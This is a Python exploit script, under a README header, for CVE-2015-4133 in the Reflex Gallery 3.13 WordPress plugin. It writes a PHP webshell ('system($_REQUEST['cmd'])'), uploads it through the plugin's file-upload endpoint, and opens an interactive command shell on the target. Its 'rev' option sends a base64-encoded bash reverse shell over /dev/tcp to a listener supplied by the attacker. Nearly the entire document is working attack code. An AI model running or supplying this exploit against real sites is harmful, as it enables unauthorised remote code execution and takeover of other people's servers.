README.md
Rendering markdown...
#!/usr/bin/python
# Libraries
import requests
import sys
import argparse
import os
import re
import time
import base64
# Colors
class c:
PURPLE = '\033[95m'
BLUE = '\033[94m'
CYAN = '\033[96m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
END = '\033[0m'
UNDERLINE = '\033[4m'
# Print banner
def banner():
exp_banner = """ ___ __ _ ___ _ _ ____ _ ____ ___ _ _ _
| _ \\___ / _| |_____ __ / __|__ _| | |___ _ _ _ _ |__ / / | |__ / | __|_ ___ __| |___(_) |_
| / -_) _| / -_) \\ / | (_ / _` | | / -_) '_| || | |_ \\_| |_ |_ \\ | _|\\ \\ / '_ \\ / _ \\ | _|
|_|_\\___|_| |_\\___/_\\_\\ \\___\\__,_|_|_\\___|_| \\_, | |___(_)_(_)___/ |___/_\\_\\ .__/_\\___/_|\\__|
|__/ |_| """
print(c.YELLOW + exp_banner + c.END)
# Add arguments
def parser():
p = argparse.ArgumentParser(description="CVE-2015-4133 - Reflex Gallery 3.13 Exploit - Arbitrary File Upload to RCE")
p.add_argument("-u", "--url", required=False, help="base URL of the wordpress target")
p.add_argument("-y", "--year", required=False, help="year to look for under wordpress uploads folder")
return p.parse_args()
# Execute commands once webshell is uploaded
def execute_commands(url, webshell_name, year):
whoami = requests.get(url + "wp-content/uploads/" + str(year) + "/09/" + webshell_name + "?cmd=whoami").text
whoami = whoami.strip()
hostname = requests.get(url + "wp-content/uploads/" + str(year) + "/09/" + webshell_name + "?cmd=hostname -I").text
hostname = hostname.strip()
print(c.BLUE + "\nType " + c.YELLOW + "help" + c.BLUE + " to see extra functions\n" + c.END)
while True:
command_to_exec = input(whoami + "@" + hostname + ":~$ ")
if command_to_exec != "exit" and command_to_exec != "quit" and command_to_exec != "help" and not command_to_exec.startswith("rev ") and command_to_exec != "clear" and command_to_exec != "cls" and command_to_exec != "?":
command_out = requests.get(url + "wp-content/uploads/" + str(year) + "/09/" + webshell_name + "?cmd=" + command_to_exec).text
print("\n" + command_out)
if command_to_exec == "help" or command_to_exec == "?":
print(c.YELLOW + "\nCommands\t\tDescription" + c.END)
print(c.YELLOW + "--------\t\t-----------" + c.END)
print(c.BLUE + "rev <ip> <port>\t\tSend a reverse shell to your netcat listener" + c.END)
print(c.BLUE + "quit/exit\t\tExit from shell" + c.END)
print(c.BLUE + "clear/cls\t\tClear terminal output" + c.END)
print(c.BLUE + "help/?\t\t\tPrint this help panel\n" + c.END)
if command_to_exec == "clear" or command_to_exec == "cls":
os.system("clear")
if command_to_exec.startswith("rev "):
print(c.BLUE + "\n[" + c.YELLOW + "*" + c.BLUE + "] Sending a reverse shell to your listener...\n" + c.END)
# Parse IP and port
ip = command_to_exec.split(" ")[1]
port = command_to_exec.split(" ")[2]
# Define bash reverse shell
reverse = f"""bash -i &> /dev/tcp/{ip}/{port} 0>&1"""
reverse = base64.b64encode(reverse.encode()).decode()
reverse = f"""echo {reverse} | base64 -d | bash"""
try:
rev_command = requests.get(url + "wp-content/uploads/" + str(year) + "/09/" + webshell_name + "?cmd=" + reverse, timeout=3)
except:
pass
if command_to_exec == "exit" or command_to_exec == "quit":
print(c.BLUE + "\n[" + c.YELLOW + "*" + c.BLUE + "] Clossing connection, bye!" + c.END)
sys.exit(0)
# Main function
def main():
# Parse arguments
args = parser()
try:
if not sys.argv[1]:
print("URL not provided, [-h/--help] to show help panel")
sys.exit(0)
except:
print("URL not provided, [-h/--help] to show help panel")
sys.exit(0)
banner()
url = args.url
# Check if target is live
time.sleep(0.2)
print(c.BLUE + "[" + c.YELLOW + "*" + c.BLUE + "] Checking connection with target..." + c.END)
checker = requests.get(url, timeout=10)
time.sleep(0.4)
if checker.status_code != 404 and checker.status_code != 500:
print(c.BLUE + "[" + c.YELLOW + "+" + c.BLUE + "] Connection established successfully" + c.END)
else:
print(c.BLUE + "[" + c.RED + "-" + c.BLUE + "] Connection refused, exiting" + c.END)
sys.exit(0)
try:
os.remove("exploit-shell.php")
except:
pass
# Create webshell file
shell = open("exploit-shell.php", "w")
shell.write("<?php system($_REQUEST['cmd']); ?>")
shell.close()
# Define file content
file = {"qqfile": open("exploit-shell.php", "r")}
if not url.endswith("/"):
url = url + "/"
# Upload file
time.sleep(0.3)
print(c.BLUE + "[" + c.YELLOW + "*" + c.BLUE + "] Uploading malicious file..." + c.END)
r = requests.post(url + "wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=" + str(year) + "&Month=09", files=file)
uploaded_name = re.findall(r'"fileName":"(.*?)"', r.text)[0].split("/")[-1]
time.sleep(0.6)
if uploaded_name != "" and "true" in r.text:
print(c.BLUE + "[" + c.YELLOW + "+" + c.BLUE + "] File uploaded successfully" + c.END)
time.sleep(0.3)
try:
os.remove("exploit-shell.php")
except:
pass
# "while" loop to execute commands in a fake-shell
print(c.BLUE + "[" + c.YELLOW + "*" + c.BLUE + "] Trying to establish a shell..." + c.END)
time.sleep(0.4)
execute_commands(url, uploaded_name, year)
if __name__ == "__main__":
# Program starts here
try:
main()
except KeyboardInterrupt:
print(c.BLUE + "\n\nInterrupt handler received, exiting..." + c.END)
sys.exit(0)